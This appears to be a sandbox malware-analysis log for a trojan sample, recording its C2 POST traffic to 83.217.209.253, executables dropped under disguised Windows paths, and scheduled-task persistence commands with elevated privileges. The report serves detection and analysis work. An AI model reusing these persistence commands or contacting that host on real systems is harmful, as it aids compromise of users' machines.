                            Source: global trafficHTTP traffic detected: POST /GameDefault0Api/Geo/ProcesswindowsLine/vm_db/Local/packettraffic/LongpollMulti/videolongpollDatalifedleLocalPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 83.217.209.253Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.253
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.253
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.253
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.253
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.253
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.253
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.253
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.253
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.253
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.253
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.253
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.253
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.253
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.253
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.253
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.253
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.253
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.253
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.253
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.253
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.253
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.253
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.253
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.253
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.253
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.253
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.253
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.217.209.253
                            Source: unknownHTTP traffic detected: POST /GameDefault0Api/Geo/ProcesswindowsLine/vm_db/Local/packettraffic/LongpollMulti/videolongpollDatalifedleLocalPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 83.217.209.253Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: iHstGpVMr4QFhc62UUbis.exe, 0000001B.00000002.1618971571.000000000314A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.217.209.253
                            Source: iHstGpVMr4QFhc62UUbis.exe, 0000001B.00000002.1618971571.000000000314A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://83.217.209.253/GameDefault0Api/Geo/ProcesswindowsLine/vm_db/Local/packettraffic/LongpollMulti
                            Source: m4n1AQRhaP.exe, 00000000.00000002.1329622101.0000000002E4A000.00000004.00000800.00020000.00000000.sdmp, m4n1AQRhaP.exe, 00000000.00000002.1329622101.00000000034BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: iHstGpVMr4QFhc62UUbis.exe, 0000001B.00000002.1618971571.000000000314A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namev&
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeFile created: C:\Windows\bcastdvr\uwTuxQS3V.exeJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeFile created: C:\Windows\bcastdvr\uwTuxQS3V.exe\:Zone.Identifier:$DATAJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeFile created: C:\Windows\bcastdvr\5b9faed1d091cfJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeFile created: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeFile created: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe\:Zone.Identifier:$DATAJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeFile created: C:\Windows\SchCache\5afd0985fdd672Jump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeFile created: C:\Windows\IME\en-GB\Registry.exeJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeFile created: C:\Windows\IME\en-GB\Registry.exe\:Zone.Identifier:$DATAJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeFile created: C:\Windows\IME\en-GB\ee2ad38f3d4382Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSC3F2531052F24CCCAD119855F7C96013.TMPJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSC3F2531052F24CCCAD119855F7C96013.TMPJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeCode function: 0_2_00007FF88B4B0E840_2_00007FF88B4B0E84
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeCode function: 0_2_00007FF88B66575D0_2_00007FF88B66575D
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeCode function: 0_2_00007FF88B662F9D0_2_00007FF88B662F9D
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeCode function: 25_2_00007FF88B528B3325_2_00007FF88B528B33
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeCode function: 25_2_00007FF88B4E0D6C25_2_00007FF88B4E0D6C
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeCode function: 25_2_00007FF88B4FAAAD25_2_00007FF88B4FAAAD
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeCode function: 25_2_00007FF88B4FC47D25_2_00007FF88B4FC47D
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeCode function: 25_2_00007FF88B4FAA5025_2_00007FF88B4FAA50
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeCode function: 25_2_00007FF88B4FC22225_2_00007FF88B4FC222
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeCode function: 25_2_00007FF88B4FC1D525_2_00007FF88B4FC1D5
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeCode function: 25_2_00007FF88B4FBFF925_2_00007FF88B4FBFF9
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeCode function: 27_2_00007FF88B538B3327_2_00007FF88B538B33
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeCode function: 27_2_00007FF88B4F0D6C27_2_00007FF88B4F0D6C
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeCode function: 27_2_00007FF88B50AAAD27_2_00007FF88B50AAAD
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeCode function: 27_2_00007FF88B50C47D27_2_00007FF88B50C47D
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeCode function: 27_2_00007FF88B50AA5027_2_00007FF88B50AA50
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeCode function: 27_2_00007FF88B50C22227_2_00007FF88B50C222
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeCode function: 27_2_00007FF88B50C1D527_2_00007FF88B50C1D5
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeCode function: 27_2_00007FF88B50BFF927_2_00007FF88B50BFF9
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeCode function: 27_2_00007FF88B6A582527_2_00007FF88B6A5825
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeCode function: 27_2_00007FF88B6A575D27_2_00007FF88B6A575D
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeCode function: 27_2_00007FF88B6A2F9D27_2_00007FF88B6A2F9D
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeCode function: 28_2_00007FF88B4FAAAD28_2_00007FF88B4FAAAD
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeCode function: 28_2_00007FF88B4FC47D28_2_00007FF88B4FC47D
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeCode function: 28_2_00007FF88B4FAA5028_2_00007FF88B4FAA50
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeCode function: 28_2_00007FF88B4FC22228_2_00007FF88B4FC222
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeCode function: 28_2_00007FF88B4FC1D528_2_00007FF88B4FC1D5
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeCode function: 28_2_00007FF88B4FBFF928_2_00007FF88B4FBFF9
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeCode function: 28_2_00007FF88B528B3328_2_00007FF88B528B33
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeCode function: 28_2_00007FF88B4E0D6C28_2_00007FF88B4E0D6C
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeCode function: 29_2_00007FF88B4FAAAD29_2_00007FF88B4FAAAD
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeCode function: 29_2_00007FF88B4FC47D29_2_00007FF88B4FC47D
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeCode function: 29_2_00007FF88B4FAA5029_2_00007FF88B4FAA50
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeCode function: 29_2_00007FF88B4FC22229_2_00007FF88B4FC222
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeCode function: 29_2_00007FF88B4FC1D529_2_00007FF88B4FC1D5
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeCode function: 29_2_00007FF88B4FBFF929_2_00007FF88B4FBFF9
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeCode function: 29_2_00007FF88B528B3329_2_00007FF88B528B33
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeCode function: 29_2_00007FF88B4E0D6C29_2_00007FF88B4E0D6C
                            Source: C:\Recovery\upfc.exeCode function: 30_2_00007FF88B4D0D6C30_2_00007FF88B4D0D6C
                            Source: C:\Recovery\upfc.exeCode function: 31_2_00007FF88B4D0D6C31_2_00007FF88B4D0D6C
                            Source: C:\Recovery\upfc.exeCode function: 31_2_00007FF88B4EAAAD31_2_00007FF88B4EAAAD
                            Source: C:\Recovery\upfc.exeCode function: 31_2_00007FF88B4EC47D31_2_00007FF88B4EC47D
                            Source: C:\Recovery\upfc.exeCode function: 31_2_00007FF88B4EAA5031_2_00007FF88B4EAA50
                            Source: C:\Recovery\upfc.exeCode function: 31_2_00007FF88B4EC22231_2_00007FF88B4EC222
                            Source: C:\Recovery\upfc.exeCode function: 31_2_00007FF88B4EC1D531_2_00007FF88B4EC1D5
                            Source: C:\Recovery\upfc.exeCode function: 31_2_00007FF88B4EBFF931_2_00007FF88B4EBFF9
                            Source: C:\Recovery\upfc.exeCode function: 31_2_00007FF88B518B3331_2_00007FF88B518B33
                            Source: C:\Recovery\upfc.exeCode function: 31_2_00007FF88B528C0531_2_00007FF88B528C05
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeCode function: 33_2_00007FF88B4B0D6C33_2_00007FF88B4B0D6C
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeCode function: 33_2_00007FF88B4CAAAD33_2_00007FF88B4CAAAD
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeCode function: 33_2_00007FF88B4CC47D33_2_00007FF88B4CC47D
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeCode function: 33_2_00007FF88B4CAA5033_2_00007FF88B4CAA50
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeCode function: 33_2_00007FF88B4CC22233_2_00007FF88B4CC222
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeCode function: 33_2_00007FF88B4CC1D533_2_00007FF88B4CC1D5
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeCode function: 33_2_00007FF88B4CBFF933_2_00007FF88B4CBFF9
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeCode function: 33_2_00007FF88B4F8B3333_2_00007FF88B4F8B33
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeCode function: 35_2_00007FF88B4FAAAD35_2_00007FF88B4FAAAD
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeCode function: 35_2_00007FF88B4FC47D35_2_00007FF88B4FC47D
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeCode function: 35_2_00007FF88B4FAA5035_2_00007FF88B4FAA50
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeCode function: 35_2_00007FF88B4FC22235_2_00007FF88B4FC222
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeCode function: 35_2_00007FF88B4FC1D535_2_00007FF88B4FC1D5
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeCode function: 35_2_00007FF88B4FBFF935_2_00007FF88B4FBFF9
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeCode function: 35_2_00007FF88B528B3335_2_00007FF88B528B33
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeCode function: 35_2_00007FF88B538C0535_2_00007FF88B538C05
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeCode function: 35_2_00007FF88B4E0D6C35_2_00007FF88B4E0D6C
                            Source: C:\Windows\IME\en-GB\Registry.exeCode function: 38_2_00007FF88B518B3338_2_00007FF88B518B33
                            Source: C:\Windows\IME\en-GB\Registry.exeCode function: 38_2_00007FF88B4EAAAD38_2_00007FF88B4EAAAD
                            Source: C:\Windows\IME\en-GB\Registry.exeCode function: 38_2_00007FF88B4EC47D38_2_00007FF88B4EC47D
                            Source: C:\Windows\IME\en-GB\Registry.exeCode function: 38_2_00007FF88B4EAA5038_2_00007FF88B4EAA50
                            Source: C:\Windows\IME\en-GB\Registry.exeCode function: 38_2_00007FF88B4EC22238_2_00007FF88B4EC222
                            Source: C:\Windows\IME\en-GB\Registry.exeCode function: 38_2_00007FF88B4EC1D538_2_00007FF88B4EC1D5
                            Source: C:\Windows\IME\en-GB\Registry.exeCode function: 38_2_00007FF88B4EBFF938_2_00007FF88B4EBFF9
                            Source: C:\Windows\IME\en-GB\Registry.exeCode function: 38_2_00007FF88B4D0D6C38_2_00007FF88B4D0D6C
                            Source: C:\Windows\IME\en-GB\Registry.exeCode function: 39_2_00007FF88B4F0D6C39_2_00007FF88B4F0D6C
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeCode function: 41_2_00007FF88B4E0D6C41_2_00007FF88B4E0D6C
                            Source: C:\Recovery\upfc.exeCode function: 42_2_00007FF88B4C0D6C42_2_00007FF88B4C0D6C
                            Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\ISkSYroH.log D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
                            Source: m4n1AQRhaP.exe, 00000000.00000000.1266049330.0000000000732000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs m4n1AQRhaP.exe
                            Source: m4n1AQRhaP.exe, 00000000.00000002.1329058890.0000000002B30000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilename$ vs m4n1AQRhaP.exe
                            Source: m4n1AQRhaP.exe, 00000000.00000002.1332365600.0000000012D97000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename$ vs m4n1AQRhaP.exe
                            Source: m4n1AQRhaP.exe, 00000000.00000002.1339029744.000000001C2A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs m4n1AQRhaP.exe
                            Source: m4n1AQRhaP.exe, 00000000.00000002.1335700228.000000001B59D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs m4n1AQRhaP.exe
                            Source: m4n1AQRhaP.exe, 00000000.00000002.1332365600.0000000012F99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename$ vs m4n1AQRhaP.exe
                            Source: m4n1AQRhaP.exeBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs m4n1AQRhaP.exe
                            Source: m4n1AQRhaP.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                            Source: m4n1AQRhaP.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: iHstGpVMr4QFhc62UUbis.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: uwTuxQS3V.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: ikEtBZXIKU1m0Gn.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: upfc.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: m4n1AQRhaP.exe, XdWiGMa4LIUYIZVEPC3.csCryptographic APIs: 'CreateDecryptor'
                            Source: m4n1AQRhaP.exe, XdWiGMa4LIUYIZVEPC3.csCryptographic APIs: 'CreateDecryptor'
                            Source: m4n1AQRhaP.exe, XdWiGMa4LIUYIZVEPC3.csCryptographic APIs: 'CreateDecryptor'
                            Source: m4n1AQRhaP.exe, XdWiGMa4LIUYIZVEPC3.csCryptographic APIs: 'CreateDecryptor'
                            Source: classification engineClassification label: mal100.spre.troj.expl.evad.winEXE@42/44@0/1
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeFile created: C:\Users\user\Desktop\mgFxlINb.logJump to behavior
                            Source: C:\Recovery\upfc.exeMutant created: NULL
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ff43a303193c00a678de5ba4183d1959ec3f4e92d3123a05110d3de5f15d096e
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1252:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6476:120:WilError_03
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeFile created: C:\Users\user\AppData\Local\Temp\ecdbob4xJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ftydHX0xsT.bat"
                            Source: m4n1AQRhaP.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: m4n1AQRhaP.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeFile read: C:\Users\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: m4n1AQRhaP.exeVirustotal: Detection: 72%
                            Source: m4n1AQRhaP.exeReversingLabs: Detection: 80%
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeFile read: C:\Users\user\Desktop\m4n1AQRhaP.exeJump to behavior
                            Source: unknownProcess created: C:\Users\user\Desktop\m4n1AQRhaP.exe "C:\Users\user\Desktop\m4n1AQRhaP.exe"
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 5 /tr "'C:\Recovery\upfc.exe'" /f
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Recovery\upfc.exe'" /rl HIGHEST /f
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 12 /tr "'C:\Recovery\upfc.exe'" /rl HIGHEST /f
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ecdbob4x\ecdbob4x.cmdline"
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE7C8.tmp" "c:\Windows\System32\CSC3F2531052F24CCCAD119855F7C96013.TMP"
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "iHstGpVMr4QFhc62UUbisi" /sc MINUTE /mo 7 /tr "'C:\Recovery\iHstGpVMr4QFhc62UUbis.exe'" /f
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "iHstGpVMr4QFhc62UUbis" /sc ONLOGON /tr "'C:\Recovery\iHstGpVMr4QFhc62UUbis.exe'" /rl HIGHEST /f
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "iHstGpVMr4QFhc62UUbisi" /sc MINUTE /mo 12 /tr "'C:\Recovery\iHstGpVMr4QFhc62UUbis.exe'" /rl HIGHEST /f
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "uwTuxQS3Vu" /sc MINUTE /mo 8 /tr "'C:\Windows\bcastdvr\uwTuxQS3V.exe'" /f
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "uwTuxQS3V" /sc ONLOGON /tr "'C:\Windows\bcastdvr\uwTuxQS3V.exe'" /rl HIGHEST /f
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "uwTuxQS3Vu" /sc MINUTE /mo 8 /tr "'C:\Windows\bcastdvr\uwTuxQS3V.exe'" /rl HIGHEST /f
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ikEtBZXIKU1m0Gni" /sc MINUTE /mo 12 /tr "'C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe'" /f
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ikEtBZXIKU1m0Gn" /sc ONLOGON /tr "'C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe'" /rl HIGHEST /f
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ikEtBZXIKU1m0Gni" /sc MINUTE /mo 10 /tr "'C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe'" /rl HIGHEST /f
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 10 /tr "'C:\Windows\IME\en-GB\Registry.exe'" /f
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Windows\IME\en-GB\Registry.exe'" /rl HIGHEST /f
                            Source: unknownProcess created: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe C:\Recovery\iHstGpVMr4QFhc62UUbis.exe
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 8 /tr "'C:\Windows\IME\en-GB\Registry.exe'" /rl HIGHEST /f
                            Source: unknownProcess created: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe C:\Recovery\iHstGpVMr4QFhc62UUbis.exe
                            Source: unknownProcess created: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe
                            Source: unknownProcess created: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe
                            Source: unknownProcess created: C:\Recovery\upfc.exe C:\Recovery\upfc.exe
                            Source: unknownProcess created: C:\Recovery\upfc.exe C:\Recovery\upfc.exe
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ftydHX0xsT.bat"
                            Source: unknownProcess created: C:\Windows\bcastdvr\uwTuxQS3V.exe C:\Windows\bcastdvr\uwTuxQS3V.exe
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: unknownProcess created: C:\Windows\bcastdvr\uwTuxQS3V.exe C:\Windows\bcastdvr\uwTuxQS3V.exe
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: unknownProcess created: C:\Windows\IME\en-GB\Registry.exe C:\Windows\IME\en-GB\Registry.exe
                            Source: unknownProcess created: C:\Windows\IME\en-GB\Registry.exe C:\Windows\IME\en-GB\Registry.exe
